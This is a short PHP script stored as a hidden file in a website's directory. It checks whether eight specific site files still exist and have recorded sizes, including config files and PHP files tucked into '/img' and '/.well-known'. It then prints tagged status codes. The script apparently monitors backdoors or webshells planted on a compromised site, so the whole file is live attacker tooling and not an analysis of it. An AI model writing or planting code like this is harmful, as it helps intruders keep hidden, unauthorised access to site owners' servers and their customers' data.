File: /home/vitanhod/vigolic-10.vitavit.com.pk/.element
<?php $r = '/home/vitanhod/vigolic-10.vitavit.com.pk'; $x = ["/orderemail.php"=>"bd@@1310212@@18",
"/includes/configOnline.php"=>"bd@@1310317@@34",
"/orderemail_bk.php"=>"bd@@1310415@@96",
"/includes/config.php"=>"bd@@1310515@@9",
"/includes/DWLSTransients.php"=>"bd@@1310620@@926",
"/img/account.php"=>"bd@@1311216@@964",
"/.well-known/lang_se.php"=>"bd@@1311233@@1004",
"/ot_tax.php"=>"bd@@1309810@@879"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');